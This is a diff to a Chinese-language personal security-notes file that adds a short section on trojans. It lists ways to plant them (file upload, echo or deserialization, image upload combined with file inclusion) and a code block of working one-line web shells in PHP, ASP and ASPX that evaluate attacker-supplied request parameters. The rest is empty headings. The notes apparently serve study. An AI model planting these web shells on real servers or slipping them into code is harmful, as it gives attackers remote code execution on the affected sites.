--- a/安全/病毒.md
+++ b/安全/病毒.md
@@ -2,8 +2,30 @@
 
 ## 木马
 
+### 木马的植入方式：
 
-# 什么事病毒
-# 有哪些类型
-# 如何防止
-# 有什么牛逼的组织
+1. 文件上传
+2. 以字符串方式上传  使用 echo 或者  命令行或者反序列化等方式写入一句话木马
+3. 上传图片+文件包含漏洞 
+
+
+
+### 木马变形：
+
+1.  函数
+
+   ```
+   php一句话木马：  <?php @eval($_POST[value]); ?>
+   asp一句话木马：  <%eval request ("value")%> 或  <% execute(request("value")) %>   
+   aspx一句话木马： <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
+   ```
+
+   
+
+
+
+
+## 什么事病毒
+## 有哪些类型
+## 如何防止
+## 有什么牛逼的组织
